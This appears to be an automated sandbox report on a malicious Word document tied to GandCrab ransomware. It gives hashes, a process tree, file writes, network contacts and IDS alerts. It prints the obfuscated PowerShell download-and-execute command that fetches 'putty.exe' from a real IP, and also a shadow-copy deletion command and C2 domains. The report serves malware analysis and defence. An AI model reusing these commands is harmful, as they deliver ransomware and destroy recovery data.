File name: | Emergеnсyеxitmар.doc |
Full analysis: | https://app.any.run/tasks/c68fcb5a-56a4-4be0-95d4-d430a7c253a0 |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous ransomware families. Ransomware is malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate, the files are lost forever. |
Analysis date: | January 23, 2019, 08:08:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jan 22 18:58:00 2019, Last Saved Time/Date: Tue Jan 22 18:59:00 2019, Number of Pages: 1, Number of Words: 9, Number of Characters: 57, Security: 0 |
MD5: | 2D25220BFD3BC6CABF1CA27D5F41A362 |
SHA1: | A0812FDAF898AAC0184C7FA08F7F11BAE29C3750 |
SHA256: | 6D20FCE7FF12863EE648EFF76A6E77E67BD78FB93FD137456CEB134DE4B30BE1 |
SSDEEP: | 384:JtBYFiSAoKXMVkZ02s3pLcHYt68jkHI1oSY7Y2W0dSVSrvFigztPASt0jjlmSrqR:jMVk2HpMJ8kHSY7YgdSVSrvgQd |
Type | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Title: | - |
Subject: | - |
Author: | admin |
Keywords: | - |
Template: | Normal.dotm |
LastModifiedBy: | Admin |
RevisionNumber: | 4 |
Software: | Microsoft Office Word |
TotalEditTime: | 1.0 minutes |
CreateDate: | 2019:01:22 18:58:00 |
ModifyDate: | 2019:01:22 18:59:00 |
Pages: | 1 |
Words: | 9 |
Characters: | 57 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | Salve |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 65 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2964 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Emergеnсyеxitmар.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3948 | powershell $AbR41ULTo = '65532.804050533$xJw0xyfhi = 65532.804050533n65532.804050533e65532.804050533w65532.804050533-obj65532.804050533e65532.804050533c65532.804050533t n65532.804050533e65532.804050533t65532.804050533.w65532.804050533e65532.804050533b65532.804050533cli65532.804050533ent; $xJw0xyfhi.d65532.804050533o65532.804050533w65532.804050533n65532.804050533l65532.804050533o65532.804050533a65532.804050533d65532.804050533f65532.804050533i65532.804050533le(\"65532.804050533h65532.804050533t65532.804050533t65532.804050533p65532.804050533://205.185.117.187/olalala/putty.exe\", \"c:\win65532.804050533dows\t65532.804050533emp\put65532.804050533t65532.804050533y65532.804050533.65532.804050533e65532.804050533x65532.804050533e\"); 65532.804050533s65532.804050533tar65532.804050533t-p65532.804050533r65532.804050533o65532.804050533ces65532.804050533s \"c:\win65532.804050533d65532.804050533o65532.804050533ws\temp\p65532.804050533u65532.804050533t65532.804050533t65532.804050533y.ex65532.804050533e\";'.replace('65532.804050533', $OPQJjrhbU);$uDzjkYGah = '';iex($AbR41ULTo); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3256 | "C:\windows\temp\putty.exe" | C:\windows\temp\putty.exe | — | powershell.exe |
User: admin Company: Nullsoft, Inc. Integrity Level: MEDIUM Description: Audience Need Zimmerman Version: 3.1.22.6 | ||||
3104 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | — | putty.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3248 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREA64.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SVAQ3MCXXMHK4O1TQ5D3.temp | — | |
MD5:— | SHA256:— | |||
3256 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
3256 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim | — | |
MD5:— | SHA256:— | |||
3256 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.wfpnwtgw | — | |
MD5:— | SHA256:— | |||
3948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2964 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:633EDCAF70A08EA4C8F9489679EF5BF4 | SHA256:446A4274C3E9935A40A0EA6332996E3ABECA0B7D59EB8A541F56397F29158E6E | |||
3256 | putty.exe | C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\WFPNWTGW-DECRYPT.txt | text | |
MD5:FE747A5E31BE420CF1211EE1CAD10730 | SHA256:2A7C25BAC5E5F054EBCEB6E9E8BB71606E3AEF4DAD4F282F4820CB138E2D219C | |||
3256 | putty.exe | C:\PerfLogs\WFPNWTGW-DECRYPT.txt | text | |
MD5:FE747A5E31BE420CF1211EE1CAD10730 | SHA256:2A7C25BAC5E5F054EBCEB6E9E8BB71606E3AEF4DAD4F282F4820CB138E2D219C | |||
3948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f3ab.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3948 | powershell.exe | GET | 200 | 205.185.117.187:80 | http://205.185.117.187/olalala/putty.exe | US | executable | 641 Kb | suspicious |
3256 | putty.exe | GET | 301 | 138.201.162.99:80 | http://www.kakaocorp.link/ | DE | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3256 | putty.exe | 138.201.162.99:443 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
3256 | putty.exe | 138.201.162.99:80 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
3948 | powershell.exe | 205.185.117.187:80 | — | FranTech Solutions | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.kakaocorp.link | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3948 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3948 | powershell.exe | Potentially Bad Traffic | ET INFO Possibly Suspicious Request for Putty.exe from Non-Standard Download Location |
3948 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3948 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3948 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |